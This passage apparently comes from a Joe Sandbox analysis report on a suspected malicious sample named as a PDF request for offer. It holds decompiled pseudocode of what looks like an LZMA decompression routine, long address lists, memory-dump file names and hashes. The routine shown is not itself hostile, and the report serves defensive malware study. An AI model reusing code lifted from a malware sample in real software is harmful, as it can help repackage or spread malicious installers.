								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406c26
0x00406c26
0x00406c2a
0x00406ce1
0x00406ce4
0x00406cf0
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x00000000
0x00406f97
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00000000
0x00406fb9
0x00406c30
0x00406c34
0x00407175
0x00407175
0x00407178
0x0040717c
0x0040717c
0x00406c3a
0x00406c40
0x00406c43
0x00406c47
0x00406c4a
0x00406c4e
0x00407114
0x00407160
0x00407168
0x0040716f
0x00407171
0x00000000
0x00407171
0x00406c54
0x00406c57
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00406c88
0x00406c88
0x00406c88
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00000000
0x00406f43
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00000000
0x004070b6
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00000000
0x00406f0b
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040672B Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040672B(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040717D))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
